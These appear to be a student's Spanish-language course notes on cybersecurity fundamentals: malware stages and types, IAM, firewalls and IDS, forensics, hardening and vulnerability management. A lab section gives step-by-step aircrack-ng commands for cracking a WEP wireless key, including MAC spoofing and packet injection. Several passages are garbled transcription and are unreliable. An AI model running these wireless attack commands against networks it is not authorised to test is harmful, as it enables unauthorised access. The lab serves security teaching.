Video Pre-Visualización Caso Practico Ciberseguridad

Ejemplo de la cadena y las fases de ataque del malware

Primero es entregado a través de un archivo .exe ejecutable, una vez ingresa al equipo trata de tener privilegio
para tener acceso al dispositivo final luego el código malicioso trata de crear una persistencia ocultándose trata
de replicarse a otros dispositivos y trata de que el archivo persiste sin ser detectado.
Luego este es llevado empieza a mirar sus objetivos finales como por ejemplo robar valores, sabotear, cifras datos,
códigos maliciosos que roba información o que abra puertas, luego vemos que una se haya cumplido el objetivo
del malware, cifrar información hay un contacto de la organización criminal del malware del centro de comando
con la víctima, donde le dice que la información ha sido cifrada, y que se necesita un rescate, y si no se quiere
que sea publicada debe de pagar o simplemente se roba la información, el ciber criminal puede vender la
información
Luego sigue el movimiento lateral, sobre los demás dispositivos para poder tener una mayor cantidad de equipos
comprometidos luego de esta cadena el malware establece una conexión remota al centro de control, ordenando
al malware cuando el atacante lo desea, ejemplo si el malware abre una puerta y los convierte en robot y los hace
registrase en la botnet este puede enviar unos comandos de control diciendo que hagan actividades específicos
como ejemplo, un pin de la muerte o un ataque de negación de servicios en una fecha específica.
Características de un ciberataque
Amenaza puede ser un ciber criminal, un profesional, un ataque, indirecto, dirigido, un virus, un troyano, etc. Es
agente o lo que va a generar la vulnerabilidad sobre un objetivo
Vector de ataque este es la entrega del malware a través de múltiples medios, el medio que va a utilizar al ataque,
ej.; correo electrónico, enlace web, una memoria USB, un puerto de red, reconocimiento de red etc. Puede un
ataque tener múltiples vectores de ataque desde diferentes frentes para cumplir sus objetivos, la suma de todos
los ataques se le llama la superficie que tiene el malware o el ciber ataque.
Intrusión este es el acceso al sistema, explotación de la vulnerabilidad, la elevación de privilegios y el
establecimiento de contacto con el objetivo (servidor etc.).
Se tiene el acceso al sistema y almacena
Infección la carga final del malware ejecuta su actividad maliciosa sobre el sistema, gana persistencia en el sistema
para evitar ser detectado y ser removidos por el antivirus anti malware habilita y establece comunicaciones con
el exterior hacia la central de control remoto (toda una infraestructura que tenga implementada el ciber atacante),
el control de los equipos puede enviar comando y acciones que se ejecuten en cualquier momento.
La amenaza puede ser el robo de identidad, cuentas de usuario, borrado de información, etc.
Invasión este es la replicación de la amenaza a través de medios como la red local, la internet recursos compartidos
etc. así otros dispositivos para tener mayor impacto sobre su víctima.
Monetización es allí donde el atacante o el ciber criminal puede exigir cambio de dinero, pude sabotear una
empresa con las publicación de datos confidenciales y pide dinero para no hacerlo, comercialización de los datos,
ejemplo, si se hace un ciber ataque a una red social y se logra obtener información de los usuarios esa información
puede ser vendida a otros criminales y va a tener una cantidad de importante el valor de esta información o
finalmente el usuario mismo puede utilizar la información de los datos como las tarjetas de crédito para hacer uso
de compras de internet o vender la información a otras personas.
Opinión
En lo que a mi concierne, todos los días estamos propensos a ser atacados por la facilidad y desinformación que
muchos manejan. Ahora en cuanto a ataques masivos, reciente salió la noticia:
El virus muestra unas letras rojas sobre un fondo negro con un mensaje en inglés que reza: "Si estás viendo este
texto, tus archivos ya no se encuentran accesibles porque han sido encriptados. Tal vez estés muy nervioso
buscando un modo de recuperar tus archivos, pero no malgastes tu tiempo. Nadie puede recuperar tus archivos
sin nuestro servicio de desencriptado".
Esta noticia fue publicada en https://www.elmundo.es/tecnologia

Cuestionario
De acuerdo a lo expuesto describa las características de un ciber-ataque.
1. Amenaza
Puede ser un ciber criminal, un profesional, un ataque, indirecto, dirigido, un virus, un troyano, etc. Es agente o
lo que va a generar la vulnerabilidad sobre un objetivo.
2. Vector de ataque
Este es la entrega del malware (programa malicioso) a través de múltiples medios, el medio que va a utilizar al
ataque, ej.; correo electrónico, enlace web, una memoria USB, un puerto de red, reconocimiento de red etc. Puede
un ataque tener múltiples vectores de ataque desde diferentes frentes para cumplir sus objetivos, la suma de todos
los ataques se le llama la superficie que tiene el malware o el ciber ataque.
3. Intrusión
este es el acceso al sistema, explotación de la vulnerabilidad, la elevación de privilegios y el establecimiento de
contacto con el objetivo (servidor etc.). Se tiene el acceso al sistema y almacena

4. Infección
La carga final del malware ejecuta su actividad maliciosa sobre el sistema, gana persistencia en el sistema para
evitar ser detectado y ser removidos por el antivirus anti malware habilita y establece comunicaciones con el
exterior hacia la central de control remoto(toda una infraestructura que tenga implementada el ciber atacante), el
control de los equipos puede enviar comando y acciones que se ejecuten en cualquier momento.
La amenaza puede ser el robo de identidad, cuentas de usuario, borrado de información, etc.
5. Invasión
Este es la replicación de la amenaza a través de medios como la red local, la internet recursos compartidos etc.
así otros dispositivos para tener mayor impacto sobre su víctima.
6. Monetización
 Es allí donde el atacante o el ciber criminal puede exigir cambio de dinero, pude sabotear una empresa con las
publicación de datos confidenciales y pide dinero para no hacerlo, comercialización de los datos, ejemplo, si se
hace un ciber ataque a una red social y se logra obtener información de los usuarios esa información puede ser
vendida a otros criminales y va a tener una cantidad de importante el valor de esta información o finalmente el
usuario mismo puede utilizar la información de los datos como las tarjetas de crédito para hacer uso de compras
de internet o vender la información a otras personas.

Principios y fundamentos de seguridad, caso practico

Concepto de Seguridad: conjunto de medidas que permiten resguardar y proteger la información buscando
mantener la disponibilidad, integridad y confidencialidad de la misma.
La seguridad es un conjunto procesos, herramientas y personas que hacen parte de la metodología correcta a
quien lo necesite.

La integridad de la información se garantiza cuando cualquier modificación inesperada es evitada.

Disponibilidad: Acceso confinable y oportuno a la información y los recursos que es permitido a los individuos
autorizados.
Confidencialidad: Hacer cumplir el nivel de secreto necesario de la información y prevenir la divulgación no
autorizada.

Definiciones de Seguridad
La seguridad informática, también conocida como ciberseguridad o seguridad de tecnología de la información, es
el área relacionada con la informática y la telemática que se enfoca en la protección de la infraestructura
computacional y todo lo relacionado con esta y, especialmente, la información contenida en una computadora o
circulante a través de las redes de computadoras.1 Para ello existen una serie de estándares, protocolos, métodos,
reglas, herramientas y leyes concebidas para minimizar los posibles riesgos a la infraestructura o a la información.
La ciberseguridad comprende software (bases de datos, metadatos, archivos), hardware, redes de computadoras
y todo lo que la organización valore y signifique un riesgo si esta información confidencial llega a manos de otras
personas, convirtiéndose, por ejemplo, en información privilegiada.
La definición de seguridad de la información no debe ser confundida con la de «seguridad informática», ya que
esta última solo se encarga de la seguridad en el medio informático, pero la información puede encontrarse en
diferentes medios o formas, y no solo en medios informáticos.
La seguridad informática es la disciplina que se encarga de diseñar las normas, procedimientos, métodos y
técnicas destinados a conseguir un sistema de información seguro y confiable.
Puesto simple, la seguridad en un ambiente de red es la habilidad de identificar y eliminar vulnerabilidades. Una
definición general de seguridad debe también poner atención a la necesidad de salvaguardar la ventaja
organizacional, incluyendo información y equipos físicos, tales como los mismos computadores. Nadie a cargo
de seguridad debe determinar quién y cuándo puede tomar acciones apropiadas sobre un ítem en específico.
Cuando se trata de la seguridad de una compañía, lo que es apropiado varía de organización en organización.
Independientemente, cualquier compañía con una red debe tener una política de seguridad que se dirija a la
conveniencia y la coordinación.

Gestion de identidad y control de acceso

La gestión de identidad y acceso se conoce también por sus siglas en inglés, IAM (Identity and Access
Management). IAM se encarga de la administración de usuarios y sus derechos de acceso dentro de la red
(comercial). Con esta gestión, la empresa mantiene el control sobre qué usuarios inician sesión y realizan
ediciones en los sistemas, aplicaciones, bases de datos, etc. Los usuarios pueden variar desde empleados a clientes
o proveedores.

Implementación práctica de IAM

La gestión de identidad y acceso se ocupa del registro de los derechos de accesos de los usuarios y determina qué
operaciones pueden realizar. Para poder hacer todo esto, se necesitan soluciones técnicas. El IAM está presente,
en cierta medida, generalmente en un sistema ERP como una de sus funcionalidades, en un sistema de gestión
documental o en el de Recursos Humanos. Sin embargo, cabe la posibilidad de que necesite seguridad adicional.
Si así fuera, podría serle interesante añadir un sistema de gestión de identidad y acceso que se vincule con los
paquetes o bases de datos existentes. Un ejemplo de sistema IAM es Azure, que trabaja con los sistemas en la
nube.

¿Cómo funciona el software de gestión de identidad y acceso?

Los sistemas IAM tienen dos funciones. La primera, verificar la identidad de aquellos que quieren iniciar sesión.
Y la segunda, determinar qué autorizaciones tiene el usuario. Ambas funciones se pueden realizar de distintas
formas.
Verificar la identidad

Lo primero que se hace en la gestión de identidad y acceso es averiguar quién inicia en el sistema o en la base de
datos. Lo más sencillo para confirmar la identidad es mediante la combinación de usuario y contraseña. Para
hacerlo de una forma más avanzada se realiza con la autenticación de múltiples factores, puede ser un código que
se le envía al usuario al móvil, una huella digital, una tarjeta clave, etc.
Comprobar el nivel de autorización

Tras quedar confirmada la identificación del usuario, el siguiente paso del sistema IAM es el gestionar el acceso.
Gracias a esto, el usuario adquiere un acceso personalizado basado en un conjunto complejo de reglas de
autorización que están almacenadas en el sistema. Los ajustes dependen de cada empresa, pero generalmente lo
que toman en consideración es la función, su puesto o autoridad y la competencia del empleado. En el caso de
clientes (B2B),la posibilidad de iniciar sesión en, por ejemplo, una tienda web, la ubicación puede ser muy
importante. Un caso puede ser el de un cliente español al que se le deniega el acceso a una tienda web francesa.

Buenas practicas y amenazas de control de acceso

En líneas generales, seguridad de datos se refiere a medidas de protección de la privacidad digital que se aplican
para evitar el acceso no autorizado a los datos, los cuales pueden encontrarse en ordenadores, bases de datos,
sitios web, etc. La seguridad de datos también protege los datos de una posible corrupción.

Análisis de vulnerabilidades

Los hackers suelen analizar las redes de forma activa o pasiva en busca de agujeros y vulnerabilidades. Los
analistas de seguridad de datos y los profesionales de la evaluación de vulnerabilidades son elementos clave en
la identificación de posibles agujeros y en cerrarlos. El software de análisis de seguridad se utiliza para aprovechar
cualquier vulnerabilidad de un ordenador, red o infraestructura de comunicaciones, priorizando y abordando cada
uno de ellos con planes de seguridad de datos que protegen, detectan y reaccionan.

Pruebas de intrusión

El análisis de vulnerabilidad (que identifica amenazas potenciales) también puede incluir deliberadamente
investigar una red o un sistema para detectar fallos o hacer pruebas de intrusión. Es una excelente manera de
identificar las vulnerabilidades antes de tiempo y diseñar un plan para solucionarlas. Si hay fallos en los sistemas
operativos, problemas con incumplimientos, el código de ciertas aplicaciones u otros problemas similares, un
administrador de red experto en pruebas de intrusión puede ayudarte a localizar estos problemas y aplicar parches
para que tengas menos probabilidades de tener un ataque.

Las pruebas de intrusión implican la ejecución de procesos manuales o automatizados que interrumpen los
servidores, las aplicaciones, las redes e incluso los dispositivos de los usuarios finales para ver si la intrusión es
posible y dónde se produjo esa ruptura. A partir de esto, pueden generar un informe para los auditores como
prueba de cumplimiento.

Una prueba de intrusión completa puede ahorrarte tiempo y dinero al prevenir ataques costosos en áreas débiles
que no conoces. El tiempo de inactividad del sistema puede ser otro efecto secundario molesto de ataques
maliciosos, por lo que hacer pruebas de intrusión con regularidad es una excelente manera de evitar problemas
antes de que surjan.

Información de seguridad y gestión de eventos

Hay una línea aún más holística de defensa que se puede emplear para mantener los ojos en cada punto de
contacto. Es lo que se conoce como Información de Seguridad y Gestión de Eventos (SIEM). SIEM es un enfoque
integral que monitoriza y reúne cualquier detalle sobre la actividad relacionada con la seguridad de TI que pueda
ocurrir en cualquier lugar de la red, ya sea en servidores, dispositivos de usuario o software de seguridad como
NIDS y firewalls. Los sistemas SIEM luego compilan y hacen que esa información esté centralizada y disponible
para que se pueda administrar y analizar los registros en tiempo real, e identificar de esta forma los patrones que
destacan.

Ciberseguridad: HTTPS, SSL y TLS

Internet en sí mismo se considera una red insegura, lo cual es algo que puede asustar cuando nos damos cuenta
que actualmente es la espina dorsal de muchas de las transacciones de información entre organizaciones. Para
protegernos de que, sin darnos cuenta, compartamos nuestra información privada en todo Internet, existen
diferentes estándares y protocolos de cómo se envía la información a través de esta red. Las conexiones cifradas
y las páginas seguras con protocolos HTTPS pueden ocultar y proteger los datos enviados y recibidos en los
navegadores. Para crear canales de comunicación seguros, los profesionales de seguridad de Internet pueden
implementar protocolos TCP/IP (con medidas de criptografía entretejidas) y métodos de encriptación como
Secure Sockets Layer (SSL) o TLS (Transport Layer Security). El software anti-malware y anti-spyware también
es importante. Está diseñado para supervisar el tráfico de Internet entrante o el malware como spyware, adware o
virus troyanos.

Detección de amenazas en punto final

Se pueden prevenir ataques de ransomware siguiendo buenas prácticas de seguridad, como tener software
antivirus, el último sistema operativo y copias de seguridad de datos en la nube y en un dispositivo local. Sin
embargo, esto es diferente para organizaciones que tienen múltiple personal, sistemas e instalaciones que son
susceptibles a ataques.

Los usuarios reales, junto con los dispositivos que usan para acceder a la red (por ejemplo, teléfonos móviles,
ordenadores portátiles o sistemas TPV móviles), suelen ser el eslabón más débil de la cadena de seguridad. Se
deben implementar varios niveles de protección, como tecnología de autorización que otorga acceso a un
dispositivo a la red.

Prevención de pérdida de datos (DLP)

Dentro de la seguridad de punto final hay otra estrategia de seguridad de datos importante: la prevención de
pérdida de datos (DLP). Esencialmente, esto abarca las medidas que se toman para asegurar que no se envían
datos confidenciales desde la red, ya sea a propósito, o por accidente. Puede implementarse software DLP para
supervisar la red y asegurarse de que los usuarios finales autorizados no estén copiando o compartiendo
información privada o datos que no deberían.

Taller laboratorio practico. Reconocimiento de red y ataque de

diccionario

Utilizando el programa Back Track.

Instalamos una máquina virtual para instalar Back track, para hacer pruebas de penetración o de hack enetico.
Inicio de Sesión con el usuario ROOT

cómo obtener contraseñas WEP usando la versión 3 de BackTrack. Lo primero y fundamental es tener
BackTrack instalado en otra partición o en una máquina virtual. Después, simplemente hay que seguir los
siguientes pasos:
1. Primero hay que comprobar si hay alguna red WEP cercana. Para ello, vamos a Inicio -> Internet -> Wireless
Assistant”.

2. Después abrimos la consola y tecleamos los siguientes comandos:

airmon-ng stop wifi0

ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0 -c (Canal)
airodump-ng wifi0

3. Miramos el BSSID y lo copiamos. A continuación, tecleamos lo siguiente:

airodump-ng -c (canal) -w mike --bssid (BSSID copiado) wifi0

4. Desde una nueva consola iniciamos un ataque de tipo 3 (Reinyección de peticiones ARP). Si hay algún cliente
conectado a la red que atacamos, en -h usaremos la MAC del cliente en lugar de la nuestra falseada de la siguiente
forma:

aireplay-ng -3 -b (BSSID que hemos copiado) -h 00:11:22:33:44:55 wifi0

5. Si no hay ningún cliente conectado a la red que atacamos, desde una nueva consola iniciamos un ataque de tipo
1 (autenticación falsa) para generar tráfico:

aireplay-ng -1 0 -a (BSSID que hemos copiado) -h 00:11:22:33:44:55 -e (ESSID) wifi0

6. Por último, esperamos a que el #Data en el airodump-ng vaya subiendo hasta llegar como mínimo a 30.000, y
después desde una nueva consola probamos el primer comando (aircrack-ng n 64 mike-01.cap) y en unos minutos
ya tendremos la clave.

PREGUNTAS
Defina qué es seguridad
conjunto de medidas que permiten resguardar y proteger la información buscando mantener la disponibilidad,
integridad y confidencialidad de la misma.

¿cuáles son los principios de la seguriad?

Integridad, disponibilidad y Confidencialidad.

¿Qué es la disponibilidad?
Acceso confinable y oportuno a la información y los recursos que es permitido a los individuos autorizados.

¿Con qué no debe confundirse la definición de seguridad de la información?

Con la seguridad informatica, ya que esta última solo se encarga de la seguridad en el medio informático, pero la
información puede encontrarse en diferentes medios o formas, y no solo en medios informáticos.

¿De qué se encarga la IAM?

se encarga de la administración de usuarios y sus derechos de acceso dentro de la red (comercial). Con esta
gestión, la empresa mantiene el control sobre qué usuarios inician sesión y realizan ediciones en los sistemas,
aplicaciones, bases de datos, etc. Los usuarios pueden variar desde empleados a clientes o proveedores.
¿Cómo funciona el software de gestión de identidad y acceso?

Los sistemas IAM tienen dos funciones. La primera, verificar la identidad de aquellos que quieren iniciar sesión.
Y la segunda, determinar qué autorizaciones tiene el usuario. Ambas funciones se pueden realizar de distintas
formas.

Criptografia: Es un método de almacenar y transmitir datos de una forma segura para que sólo aquellos o quiénes
a quienes se destina puedan leer y procesar esta información la criptografía
se considera una ciencia de protección de la información mediante el cifrado la codificación en un formato legible
la criptografía es una forma efectiva de proteger la información sensible ya que es almacenada y transmitida a
través de los medios de el cifrado o encriptación es un método de transformación de datos legibles llamados texto
plano o Plain text en una forma que parece ser desordenada aleatoria y es ilegible
un sistema producto que proporciona cifrado y descifrado a la información se puede crear a través de componentes
de Hardware y códigos de programa en una aplicación o software el sistema de cifrado utiliza un algoritmo de
cifrado determina con simple algoritmo determina con simple o complejo es el proceso de cifrado las llaves los
componentes de los componentes de software

Un algoritmo o conjunto con un algoritmo se utiliza para cifrar y descifrar el texto plano el algoritmo de cifrado
también se conoce como una cripto variable el algoritmo utiliza un espacio o rango de valores para generar
diferentes longitudes de llaves

La llave se utiliza para descifrar mensaje específico la fortaleza de un método de cifrado se correlaciona
con la cantidad de procesamiento los recursos y el tiempo necesario para romper el criptosistema o para encontrar
el valor de la llave romper un sistema de cifrado se puede lograr mediante un ataque de fuerza bruta
El objetivo en el diseño de un método de cifrado César que sea muy difícil de desinflar El romper que tomé
demasiado recursos de procesamiento y demasiado tiempo para lograr otro nombre para la fuerza de criptografía
sulfato de trabajo work factor que es la estimación del esfuerzo y los recursos necesarios que necesitaría un
atacante debería tener un atacante para poder penetrar un sistema de cifrado comemos aquí está atacante y sé que
eso le que probar 74 cuatrillones de llaves para poder vulnerar una llave de un
Un sistema genera información que al transmitirla por un canal como internet o correo electrónico a través de
una VPN y mientras está almacenada por ejemplo en un servidor en una base de datos autenticación esta verificar
la identidad de un usuario o sistema que generó la información
Firewall
Aplicacion que aplica reglas de filtrado las comunicaciones a través de IP para restringir el acceso de sus redes
locales desde internet y viceversa son utilizados para restringir las comunicaciones entre segmentos de red dentro
de la empresa y los recursos sensibles por ejemplo un administrador podría restringir el acceso de la red del área
investigación y desarrollo de las otras áreas de la empresa con un paro y permitir únicamente el tráfico que se
considere como no riesgoso peligroso atrás de los protocolos y específicamente las comunicaciones necesaria
como comunicaciones de archivos compartidos o comunicaciones de navegación o de conexión a aplicaciones
específicas.
Proxy:
Es un intermediario entre los clientes que establecen conexiones externas hacia internet el Proxy filtre y analiza
el tráfico por ejemplo de tráfico web como vemos en la imagen está el equipo del usuario el cual trata de establecer
una conexión con internet y
Proxy también es conocido en ciberseguridad como filtrado de contenido web filter continuamos
IPS
Analizar tráfico de red en tiempo real para la detección y prevención de amenazas a través de firmas y
comportamientos elipse es un sistema de prevencion de intrusiones las siglas traducciones analiza el tráfico de
red en tiempo real para la detección y prevención de amenazas a través de firmas y comportamientos están
diseñados y configurados por los fabricantes de esta solucion amenazas Como por ejemplo denegación de servicio
reconocimiento de red inyección de comandos botonets etcétera
Se pueden realizar acciones preventivas y correctivas sobre las comunicaciones que son catalogadas como
maliciosas o no segura y las bloquean tiempo real
IDS
lds se basa en la detección de accesos no autorizados O ataques a través de sensores que analizan el tráfico en
tiempo real tráfico de la red estos reaccionan de forma automática y detectan ataques basados en firmas y
comportamientos que involucran eventos como cantidad de datos y peticiones reconocimiento de la red y acción
de comando comportamientos maliciosos conocidos o desconocidos entre otros el tráfico de redes filtrado a través
de un puerto a Puerto espejo
Email Proteccion
analiza el correo electrónico en busca de spam y amenazas recibe actualizaciones de reputación de mitad blancas
y negras blancas como dominios direcciones IP estas soluciones también denominadas como protección
protección ofrece una protección antivirus antimalware y analiza archivos adjuntos de una protección completa
antispam por ejemplo previene que tengan promociones descuentos a los buzones de los de los usuarios de la
relativamente o simplemente correo electrónico no deseado
UTM
De las siglas unified threat management fue desarrollado para proporcionar todas o la mayoría de las soluciones
de seguridad mencionadas en un único dispositivo de Río de Luz tm son las civilizaciones talacion mantenimiento
y control centralizado además de la capacidad de comprender la seguridad de toda la red desde un único punto
central y desde un punto de vista holístico
Firewall Cisco ASMD
Algunas de sus características

• Muestra IP por las interfaces de red pasa todo el tráfico a través del par uno se recibe y se reenvía el se le
aplican filtros comunicación hace que las conexiones por segundo
• consumo de memoria RAM
• mensajes el registra para el tráfico
• resumen de las estadísticas de las conexiones que están establecido en este momento
• Resumen de servicios o usuarios
• Origen y destino de comunicación
• Protocolos utilizados
• Listas de control de acceso
Malware
Iniciar con el malware las amenazas actuales son desarrolladas con automatizar una puerta abierta a través de
diferentes medios replicarse fácilmente es un código o software malicioso Existen varios tipos de propagarse a
través de diferentes medios como correo electrónico medios compartidos transferencia de archivos Descargar
archivos navegación en internet medios de almacenamiento extraíbles entre otros
Etapas del malware

• Insercion: en este paso el malware se instalan el sistema de la virgen

• Evasion: Usa métodos para evitar ser detectado
• Erradicacion: Borra archivos que utilio para infectar la victima
• Replicacion: Hace copias de si mismo y se extiende
• Descencadenante: Usa evento especifico para iniciar su ejecucion
• Caega Payload: Carga su archivo final, eliminar archivos, instalar una back door

Tipos de Malware
Gusanos: gusano diferencia de los virus pueden reproducirse por sí mismo sin una aplicación son programas
autónomos
Rootkit: es un conjunto de software que permite un acceso de privilegio continuo a un ordenador pero que
mantiene su presencia activamente oculta al control de los administradores al corromper el funcionamiento normal
del sistema operativo o de otras aplicaciones.
Spyware: El spyware o software espía instala secretamente en un equipo para obtener información sensible de
las víctimas los datos recogidos pueden ser utilizados para actividades maliciosas como por ejemplo el robo de
identidad fraudes envío de correo electrónico no deseado o spam
Adware: genera anuncios publicitarios automáticamente estos anuncios a través de ventanas emergentes
componentes de interfaz gráfica de navegadores web o programas como el objetivo de la es generar ingresos por
publicidad y ventas realizar actividades maliciosas
Ransomware: Aqui los archivos del sistema restringe el acceso a los archivos del sistema infectado y pide rescate
un rescate económico a cambio de descifrar o liberar la información del usuario que fue capturado secuestrada
los archivos son cifrados mediante el algoritmo de cifrado que utiliza en una llave o una clave extensa que
únicamente el atacante conoce
Bootnet: Botnet son bots un grupo de robots un tipo de malware que se instalan miles o millones de ordenadores
o computadoras o dispositivos finales a través de medios como correo electrónico descarga de archivos uso de
medios compartidos navegación en internet el robot explotar las vulnerabilidades que tenga el sistema y una vez
instalada. Por lo general permanece estático y preparado para desarrollar sus actividades maliciosas como enviar
Spam, o ataque Dos

Bomba Logica: bomba lógica estas ejecuta en un programa una cadena de código cuando se cumple un
determinado conjunto de condiciones por ejemplo un administrador de red puede instalar y configurar una bomba
lógica que está programada para borrar toda la base de datos de la empresa si el es despedido

Troyanos: es un programa que se hace pasar por otro programa se disfraza y engaña el usuario que ejecuta el
programa confiadamente es como un suplantador un caballo de Troya puede ser llamado por ejemplo un punto
exe con bloc de notas.

Video Informática forense y recolección de evidencia

Resumen
Esta relacionada entre la evidencia encontrada en computadores, dispositivos y medios de almacenamiento digital.
Tiene como objetivo examinar los medios digitales de una manera valida, de tal modo que los resultados obtenidos
puedan ser utilizados para efectos legales. Recuperación de los datos o hallazgos obtenidos en forma individual,
las evidencias de las investigaciones son sometidas a diferentes normas estandarizados para la identificación de
su veracidad y verdad.
Ramas de la Informática forense
Computación forense Procura descubrir interpretar la información en los medios informáticos digitales para tener
hipótesis y hechos, además ofrece información residente en los equipos o medios digitales.
Análisis forense en redes Es complejo es necesario comprender como los protocoles estructuras se interconectan
entre si para dar resultados en el tiempo, se debe ser capaz de conocer los dispositivos de redes, con el fin de
establecer los rastros de un intruso, correlación de eventos comprende los análisis de resultados, todas las
soluciones de seguridad que prestan servicios generalmente generan eventos que pueden ser analizados en tiempo
real, pueden ayudar a prevenir o a identificar comportamientos maliciosos y alertar a tiempo, luego que ocurrió e
evento es posible recrear, cuales fueron los activos que vulnero para aprender luego a prevenir y ver por donde
ingresaron los atacantes a nuestra red, cuales fueron los protocolos que utilizaron etc.
Análisis forense digital Esta es una forma de aplicar conceptos estratégicos de la criminalística tradicional a los
medios informáticos especializados con el fin de apoyar a la administración de justicia de los posibles delincuentes
o como una disciplina especializada que procura el esclarecimiento de los hechos, como cuando quién y por qué.
Recolección de evidencia
• Lo debe hacer personal capacitado y con experiencia
• Seguir los procedimientos y buenas practicas
• Contar con las herramientas adecuadas
• Preservar la integridad, confidencialidad y disponibilidad de los datos(evidencia).
Este tema no es algo que un administrador de la red debe de llevar a cabo, las personas que llevan a cabo la
investigación forense deben ser especialistas en el área, deben saber dónde, cuándo y a quien buscar, para que la
información no deba ser alterada. Si alguien tiene acceso a la información y la tergiversa podría cambiar el tiempo
en los ficheros de interés, además podría borrar las huellas y registros digitales que dejo el criminal. La mayoría
de las evidencias tienen una vida útil corta, debe ser recogida de forma rápida por debida a su volatilidad, en
algunas situaciones es mejor desconectar el sistema de la red, hacer una copia de la memoria RAM, y realizar un
análisis forense, también hacer una copia del disco duro de la maquina y trabajar una copia de todo lo que tiene
la máquina Trabajar desde una copia permite que esta no sea afectada. Debe de haber dos imágenes.
Imagen primaria ejemplar del control que se almacena
Imagen de trabajado para el análisis de prueba con fecha en que se recoge la fecha, además el investigador debe
de asegurarse, que los medios han sido purgados es decir no datos residuales.
Es importante crear un hash, en una hulla de los archivos de antes y después del análisis para garantizar la
integridad de la imagen contenida, una vez con la copia del equipo y memoria RAM se debe correr un hash una
cadena de caracteres para cuando la comparemos en el futuro.
Cuando se corre el hash tan pronto la sacan queda este valor cuando se va a comparar mas adelante y se compare
con el estado original ahí sabremos que la información es la misma, que el hash que tiene la copia original con la
copia que se utilizo es el mismo, eso garantiza que no fue modificad la información.
Investigación de incidentes
• Análisis de red
• Análisis de medios
• Análisis de software
 • Análisis de hardware y dispositivos embebidos.
Análisis de red:
Podemos analizar comunicaciones logs y rastreo de rutas
Analís de medios:
copias y toma de imagen de disco duro, direcciones Mac, de modificación de acceso y comunicación de contenido.
Análisis de software:
Esta se refiere a la ingeniería inversa de código maliciosos
Análisis de hardware y dispositivos embebidos:
El punto de ataque dedicado a la inspección del firmware del registro de ambientes virtualizados de todo lo que
tenga que ver con los dispositivos finales.

Opinión
El uso de la tecnología en la ciencia forense me parece excelente, puesto que además de llegar con el delincuente,
a su vez los agentes aumentan la seguridad de sus servidores en la medida que aumentan sus habilidades.
Cuestionario
1. ¿Para qué sirve? Para garantizar la efectividad de las políticas de seguridad y la protección tanto de la
información como de las tecnologías que facilitan la gestión de esa información.
2. ¿En qué consiste? Consiste en la investigación de los sistemas de información con el fin de detectar
evidencias de la vulneración de los sistemas.
3. ¿Cuál es su finalidad? Cuando una empresa contrata servicios de Informática forense puede perseguir
objetivos preventivos, anticipándose al posible problema u objetivos correctivos, para una solución favorable una
vez que la vulneración y las infracciones ya se han producido.
4. ¿Qué metodologías utiliza la Informática forense? Las distintas metodologías forenses incluyen la
recogida segura de datos de diferentes medios digitales y evidencias digitales, sin alterar los datos de origen. Cada
fuente de información se cataloga preparándola para su posterior análisis y se documenta cada prueba aportada.
Las evidencias digitales recabadas permiten elaborar un dictamen claro, conciso, fundamentado y con
justificación de las hipótesis que en él se barajan a partir de las pruebas recogidas.
5. ¿Cuál es la forma correcta de proceder? Y, ¿por qué? Todo el procedimiento debe hacerse tenido en
cuenta los requerimientos legales para no vulnerar en ningún momento los derechos de terceros que puedan verse
afectados. Ello para que, llegado el caso, las evidencias sean aceptadas por los tribunales y puedan constituir un
elemento de prueba fundamental, si se plantea un litigio, para alcanzar un resultado favorable.
 6. ¿Qué es lo que se puede analizar?
• Disco duro de una Computadora o Servidor
• Documentación referida del caso.
• Logs de seguridad.
• Credenciales de autentificación
• Trazo de paquetes de red.
• Teléfono Móvil o Celular, parte de la telefonía celular,
• Agendas Electrónicas (PDA)
• Dispositivos de GPS.
• Impresora
• Memoria USB

Videos Hardening (Endurecimiento del sistema)

Resumen

Hardening
Es el proceso de asegurar un sistema mediante la reducción de vulnerabilidades. Una aplicación o un componente
que no está en servicio no puede tener vulnerabilidad. Este puede ser aplicado sobre componentes, módulos y
funcionabilidades.
Aplicación, parámetro, servicio o proceso
Las aplicaciones las hacen el sistema operativo, los parámetros están configuradores por temas de negación de
servicio, se permite consultar información necesaria, los servicios o procesos necesarios que estén corriendo en
el sistema en el equipo que ahora la escucha, mediante un análisis los atacantes pueden identificar las posibles
acciones del sistema. Esto se puede realizar sobre puertos protocolos, métodos.
Opinión
Es importante hacer esta practica con el objetivo de hacer mas fuertes nuestros servidores, y así no ser víctima de
ciber ataques.
Cuestionario

1. ¿Qué es hardening?
Un conjunto de actividades que son llevadas a cabo por el administrador de un sistema operativo para reforzar
al máximo posible la seguridad de su equipo.
2. Mencione las actividades propias de un proceso de hardening se pueden contar.
• Configuraciones necesarias para protegerse de posibles ataques físicos o de hardware de la máquina
• Instalación segura del sistema operativo.
• Activación y/o configuración adecuada de servicios de actualizaciones automáticas
• Instalación, configuración y mantención de programas de seguridad
• Configuración de la política local del sistema
• Configuración de opciones de seguridad generales
• Restricciones de software etc.
Video Gestión de vulnerabilidades
Resumen

Las pruebas de vulnerabilidad manuales, automatizadas o la combinación de ambas, requieren de personal y

consultores con un conocimiento amplio de seguridad y un alto nivel de confiabilidad.

Objetivos
• Evaluar el verdadero estado de seguridad de un entorno
• Identificar el mayor numero de vulnerabilidades posible, hacer una evaluación honesta y priorizar
• Probar el funcionamiento de los sistemas y su reacciona miento ante ciertas circunstancias.
CVE Common vulnerabilities and exposures
Es una lista de información registrada sobre vulnerabilidades en la que cada referencia tiene un número de
identificación único. Es un estándar global donde se definen las vulnerabilidades.
CVSS trata de un sistema de puntaje para proveer un modo abierto y estándar que permite estima el impacto de
derivado de vulnerabilidades localizadas.
Grupo de métricas base
Representan las características intrincadas a la vulnerabilidad que son constantes en el tiempo, definen como se
puede hacer una vulnerabilidad y se cumplen las condiciones para ser explotadas.
Grupo de métricas temporales
Esta representa las características de una vulnerabilidad que pueden cambiar en el tiempo, pero son constantes en
el ambiente de un usuario.
Grupo de métricas de entorno
Representa las características de una vulnerabilidad que son relevantes y únicas para el entorno del usuario en
particular, se enfoca a las características del entorno del usuario son opcionales el cual es utilizado cuando el
usuario considera que la métrica no existe.

OpeVAS análisis y escaneo de vulnerabilidades, herramientas especializadas en el escaneo de sistemas

informático, todos los productos son gratuitos bajo licencias libres.

Opinión
En lo que a mi respecta La vulnerabilidad es la debilidad o fallo que presenta un sistema de información. Este es
capaz de poner en riesgo la seguridad de toda o parte de la información. Es decir, es un problema que tenemos
nosotros, nuestro sistema.
